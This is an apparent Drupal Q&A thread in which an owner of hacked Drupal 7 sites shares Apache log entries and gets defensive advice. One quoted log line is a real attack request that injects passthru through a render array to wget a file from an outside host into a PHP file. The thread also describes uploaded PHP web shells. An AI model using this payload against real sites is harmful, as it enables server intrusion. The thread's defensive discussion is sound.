# Sites hacked across login pages

Tags: 7, security

My Drupal 7 sites were hacked many times, and I find everytime some files created by the hackers.  Even though I did the security update, that didn't prevent the hackers to access to the server.
Recently I saw the Apache log and I found some serious security problems. They try accessing across the login form on /user and some files in the file module folder.

> POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=wget%20-c%20g.wpblogapi.com/acui/innc.zip%20-O%20tmps.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6

> GET /modules/file/tests/lbuzsboe.php HTTP/1.1" 404 - "..../modules/file/tests/lbuzsboe.php

Please provide me your suggestions to resolve this problem. I have no experience on web security.

Comment: here is a good read on compromised drupal 7 sites https://drupal.stackexchange.com/questions/133996/drupal-sa-core-2014-005-how-to-tell-if-my-server-sites-were-compromised

Comment: I am not sure which problem you see. The response for those requests is a 404 error, which means they **don't** have access to pages they should not see. They are even using the wrong URLs.

Comment: Also, with the first request, they aren't even trying to log in. I guess they are trying to retrieve the password, but it doesn't work like that, on Drupal.

Comment: @kiamlaluno you're right, but it's just two lines  from hundreds of lines and many access log files, they attack a number of drupal 7 in the server with same way.

Comment: As long as they don't 'come through' and get the 404's, your site is not vulnerable and you are fine. They just try. If you find you want to block such requests, you'd need to find a scheme behind them and explicitly have to create blocking rules in your webserver. However, that is off-topic in this group. Therefore, I recommend to close this question.

Comment: Nothing there indicates your site has been compromised.

Comment: @MarioSteinitz I don't know, but they access somehow via a form, and they create files and delete index.php , so it's not off-topic.

Answer (score 1):

I had this problem before with some friend about files folder

The solution to this problem is:

1.- in your apache conf or nginx conf or .htaccess disable all formats php in the path `/files/*`

2.- if you have the opportunity change the permissions to the folder but the first point works, they will upload files php but, they will not run it.

3.- remove estrange files php and search for every file that contains text like base64, search something about this in google or other searcher.

They enter by a port using exploits and add a file like image.php.jpg, and after the file is uploaded, they change the name to `image.php` (it is not the real name but you get the idea).

That file is an php form, they upload files php through it, like a command line and do a lot of things...

I hope this help you.

Comment: Thank you, I will follow  the steps in  your solution and I'll come back to tell you the result, thank you so much